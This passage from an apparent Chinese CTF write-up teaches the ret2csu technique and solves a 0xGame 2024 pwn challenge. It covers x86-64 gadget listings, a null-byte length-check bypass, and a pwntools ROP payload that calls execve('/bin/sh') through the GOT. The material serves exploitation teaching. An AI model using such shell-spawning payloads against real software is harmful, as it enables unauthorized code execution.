#81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">retn<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u8fd9\u6bb5\u4ee3\u7801\u9996\u5148\u5c06<code>rsp<\/code>\u52a08\uff0c\u8fd9\u884c\u4ee3\u7801\u4e00\u822c\u53ef\u4ee5\u5ffd\u7565\uff0c\u800c\u540e\u9762\u5219\u662f\u4f9d\u6b21\u5c06\u6808\u9876\u5143\u7d20\u5f39\u51fa\u81f3<code>rbx<\/code>,<code>rbp<\/code>,<code>r12<\/code>,<code>r13<\/code>,<code>r14<\/code>,<code>r15<\/code>\u901a\u8fc7\u8fd9\u6bb5\u6c47\u7f16\u4ee5\u53ca\u4e0a\u9762\u63d0\u5230\u7684\u90a3\u4e00\u6bb5\u6c47\u7f16\uff0c\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7684\u5bc4\u5b58\u5668\u6709\uff1a<code>rbx<\/code>,<code>rbp<\/code>,<code>rdx<\/code>,<code>rsi<\/code>,<code>rdi<\/code>\u7684\u4f4e32\u4f4d\uff08\u5373<code>edi<\/code>\uff09,<code>r12<\/code>,<code>r13<\/code>,<code>r14<\/code>\u53ca<code>r15<\/code>\uff0c\u901a\u8fc7\u8fd9\u4e24\u6bb5\u4ee3\u7801\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u63a7\u5236\u5f88\u591a\u53c2\u6570\uff0c\u7b97\u662f\u4e00\u6bb5\u4e07\u80fd\u7684gadgets.<\/p>\n\n\n\n<p>\u5728\u5229\u7528\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4e00\u822c\u4f1a\u5148\u6267\u884ccsu2\uff0c\u5c06\u4e00\u4e9b\u6211\u4eec\u60f3\u8981\u7684\u53c2\u6570\u538b\u5165\u6808\u4e4b\u540e\u4f9d\u6b21\u5f39\u51fa\u5230\u5bf9\u5e94\u5bc4\u5b58\u5668\u4e2d\uff0c\u518d\u53bb\u6267\u884ccsu1\uff0c\u6211\u4eec\u6ce8\u610f\u5230\uff0ccsu1\u7684\u672b\u5c3e\u5e76\u6ca1\u6709<code>ret<\/code>\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u5728\u6267\u884c\u5b8c<code>csu1<\/code>\u4e4b\u540e\uff0c\u7a0b\u5e8f\u8fd8\u4f1a\u518d\u6b21\u6267\u884ccsu2\uff0c\u6240\u4ee5\u5728\u6784\u9020payload\u7684\u65f6\u5019\uff0c\u82e5\u6211\u4eec\u4e0d\u9700\u8981\u518d\u6b21\u64cd\u63a7\u5bc4\u5b58\u5668\u7684\u503c\uff0c\u5c31\u53ef\u4ee5\u5728<code>csu1<\/code>\u4e4b\u540e\u6dfb\u52a0\u4e00\u4e32\u957f\u5ea6\u4e3a0x38\uff08\u4e5f\u5c31\u662f7\u4e588\uff09\u7684\u5783\u573e\u6570\u636e\uff08\u5982\u679c\u8981\u64cd\u63a7\u5c31\u518d\u6784\u9020\u4e00\u6b21\u5c31\u884c\uff09\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u5728csu2\u91cc\u9762\u9690\u85cf\u4e86\u4e00\u6bb5<code>pop rdi<\/code>\u4ee5\u53ca\u4e00\u6bb5<code>pop rsi<\/code>\uff0c\u56e0\u4e3a<code>pop rdi<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>5F<\/code>\uff0c\u800c<code>pop r15<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>41 5F<\/code>\uff0c\u8fd9\u4e2a\u65f6\u5019\u6211\u4eec\u5c31\u53ef\u4ee5\u622a\u53d6<code>pop r15<\/code>\u7684\u540e\u534a\u6bb5\u6765\u5f97\u5230<code>pop rdi<\/code>\uff1b\u53c8\u7531\u4e8e<code>pop rsi<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>5E<\/code>\uff0c\u800c\u800c<code>pop r14<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>41 5E<\/code>\uff0c\u6240\u4ee5\u6211\u4eec\u5c31\u53ef\u4ee5\u622a\u53d6<code>pop r14<\/code>\u7684\u540e\u534a\u6bb5\u6765\u5f97\u5230<code>pop rsi<\/code>\uff0c\u6240\u4ee5\u9700\u8981\u5229\u7528<code>pop rdi<\/code>\u4e0e<code>pop rsi<\/code>\u4e24\u6bb5\u6c47\u7f16\u7684\u65f6\u5019\u5f80\u5f80\u4f1a\u6765\u8fd9\u91cc\u627e.<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[0xgame 2024 Week1] ret2csu<\/h4>\n\n\n\n<p>\u9898\u76ee\u9644\u4ef6\u5728\u8fd9\u91cc\u80fd\u627e\u5230\uff1a<a href=\"https:\/\/github.com\/X1cT34m\/0xGame2024\/tree\/main\/Pwn\">0xGame2024\/Pwn at main \u00b7 X1cT34m\/0xGame2024<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-33.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-33.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"288\" height=\"137\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-33.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-166\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5e76\u6ca1\u6709\u5f00\u542f\u4efb\u4f55\u4fdd\u62a4\uff0c\u770b\u5230<code>main<\/code>\u51fd\u6570\u6709:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-34.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-34.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"702\" height=\"379\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-34.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-167\"  sizes=\"auto, (max-width: 702px) 100vw, 702px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u8fd9\u91cc\u8ba9\u6211\u4eec\u5411<code>something<\/code>\u4e2d\u8f93\u5165\u4e00\u4e9b\u4e1c\u897f\uff0c\u663e\u7136\u8fd9\u4e2a<code>something<\/code>\u5728\u5185\u5b58\u4e2d\uff0c\u800c\u540e\u9762\u8981\u8f93\u5165<code>buf<\/code>\uff0c<code>buf<\/code>\u7684\u7a7a\u95f4\u4e3a16\u5b57\u8282\uff0c\u4f46\u662f\u53ef\u4ee5\u8f93\u5165\u7684\u5b57\u8282\u6570\u4e3a0x60\uff0c\u660e\u663e\u5b58\u5728\u6808\u6ea2\u51fa\uff0c\u4f46\u662f\u540e\u9762\u5bf9<code>buf<\/code>\u7684\u957f\u5ea6\u8fdb\u884c\u6bd4\u8f83\uff0c\u8981\u6c42\u4e0d\u80fd\u8d85\u8fc70x10\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>\\x00<\/code>\u622a\u65ad\u6765\u7ed5\u8fc7\uff0c\u73b0\u5728\u6211\u4eec\u770b\u6ea2\u51fa\u4e4b\u540e\u6211\u4eec\u9700\u8981\u6267\u884c\u4ec0\u4e48\u64cd\u4f5c\uff0c\u5bfb\u627e\u53d1\u73b0\u6709\u4e00\u4e2a\u51fd\u6570\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-35.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-35.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"85\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-35.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-168\"  sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u91cc\u9762\u6709\u4e00\u4e2a\u9700\u8981\u4f20\u5165\u53c2\u6570\u7684<code>execve<\/code>\uff0c\u53ef\u4ee5\u770b\u5230\u5b83\u7684\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u4e3a\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-36.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-36.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"787\" height=\"121\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-36.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-169\"  sizes=\"auto, (max-width: 787px) 100vw, 787px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u662f\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>filename<\/code>\uff0c\u5b58\u5728<code>rdi<\/code>\u5bc4\u5b58\u5668\u5185\uff0c\u8868\u793a\u51c6\u5907\u8f7d\u5165\u5f53\u524d\u8fdb\u7a0b\u7a7a\u95f4\u7684\u65b0\u7a0b\u5e8f\u7684\u8def\u5f84\u540d\uff1b<\/li>\n\n\n\n<li><code>argv[]<\/code>\uff0c\u5b58\u5728<code>rsi<\/code>\u5bc4\u5b58\u5668\u5185\uff0c\u8868\u793a\u4f20\u7ed9\u65b0\u8fdb\u7a0b\u7684\u547d\u4ee4\u884c\u53c2\u6570\uff1b<\/li>\n\n\n\n<li><code>envp[]<\/code>\uff0c\u8baf\u5728<code>rdx<\/code>\u5bc4\u5b58\u5668\u5185\uff0c\u6307\u5b9a\u4e86\u65b0\u7a0b\u5e8f\u7684\u73af\u5883\u5217\u8868.<\/li>\n<\/ol>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u8981\u5229\u7528<code>execve<\/code>\u8fd9\u4e2a\u51fd\u6570\uff0c\u6211\u4eec\u5411\u4e09\u4e2a\u5bc4\u5b58\u5668\u4e2d\u5b58\u5165\u6570\u636e\u7684\u5bf9\u5e94\u5173\u7cfb\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rdi<\/code><\/td><td><code>\/bin\/sh<\/code>\u7684\u5730\u5740<\/td><\/tr><tr><td><code>rsi<\/code><\/td><td>0<\/td><\/tr><tr><td><code>rdx<\/code><\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u5bf9\u4e8e<code>\/bin\/sh<\/code>\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5411<code>something<\/code>\u4e2d\u5199\u5165\u6765\u5f97\u5230\uff0c\u73b0\u5728\u89e3\u51b3\u5411\u51fd\u6570\u5185\u4f20\u5165\u53c2\u6570\u7684\u95ee\u9898\uff0c\u901a\u8fc7\u67e5\u627e\u53ef\u4ee5\u53d1\u73b0\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-37.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-37.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"364\" height=\"100\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-170\"  sizes=\"auto, (max-width: 364px) 100vw, 364px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u7f3a\u5c11<code>pop rdx<\/code>\u8fd9\u4e00\u6761\u91cd\u8981\u7684\u6307\u4ee4\uff0c\u6240\u4ee5\u6211\u4eec\u8003\u8651\u4f7f\u7528ret2csu\uff0c\u89c2\u5bdf\u8be5\u7a0b\u5e8f\u7684<code>__libc_csu_init<\/code>\u51fd\u6570\uff0c\u53ef\u4ee5\u53d1\u73b0\u6709\u5982\u4e0b\u4e24\u6bb5\u6c47\u7f16\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6bb5\u4e3a\uff08\u8bb0\u4f5c<code>csu1<\/code>\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>loc_4013A0:\nmov     rdx, r14\nmov     rsi, r13\nmov     edi, r12d\ncall    ds:(__frame_dummy_init_array_entry - 403E10h)&#91;r15+rbx*8&#93;\nadd     rbx, 1\ncmp     rbp, rbx\njnz     short loc_4013A0<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">loc_4013A0<\/span><span style=\"color: #ECEFF4\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rdx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">edi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r12d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">call<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #81A1C1\">ds<\/span><span style=\"color: #D8DEE9FF\">:(__frame_dummy_init_array_entry - <\/span><span style=\"color: #B48EAD\">403E10h<\/span><span style=\"color: #D8DEE9FF\">)&#91;<\/span><span style=\"color: #81A1C1\">r15<\/span><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">*<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #D8DEE9FF\">&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">cmp<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">jnz<\/span><span style=\"color: #D8DEE9FF\">     short loc_4013A0<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7b2c\u4e8c\u6bb5\u4e3a\uff08\u8bb0\u4f5c<code>csu2<\/code>\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>add     rsp, 8\npop     rbx\npop     rbp\npop     r12\npop     r13\npop     r14\npop     r15\nretn<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">retn<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7531<code>csu1<\/code>\u4e2d\u5404\u5bc4\u5b58\u5668\u7684\u5bf9\u5e94\u5173\u7cfb\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>csu2<\/code>\u5411\u5bc4\u5b58\u5668\u4e2d\u5b58\u5165\u5982\u4e0b\u6570\u636e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rbx<\/code><\/td><td>0<\/td><\/tr><tr><td><code>rbp<\/code><\/td><td>1<\/td><\/tr><tr><td><code>r12<\/code><\/td><td><code>\/bin\/sh<\/code>\u7684\u5730\u5740<\/td><\/tr><tr><td><code>r13<\/code><\/td><td>0<\/td><\/tr><tr><td><code>r14<\/code><\/td><td>0<\/td><\/tr><tr><td><code>r15<\/code><\/td><td><code>execve<\/code>\u7684got\u8868\u5730\u5740<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u7b2c\u4e00\u6bb5\u4e3a\uff08\u8bb0\u4f5c<code>csu1<\/code>\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload = b'\\x00' * 0x10 + b'=Triode='\npayload += p64(csu2)\npayload += p64(0)           # add rsp, 8\npayload += p64(0)           # pop rbx\npayload += p64(1)           # pop rbp\npayload += p64(sh)          # pop r12\npayload += p64(0)           # pop r13\npayload += p64(0)           # pop r14\npayload += p64(execve_got)  # pop r15\npayload += p64(csu1)\npayload += b'\\x00' * 0x38 + p64(main)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 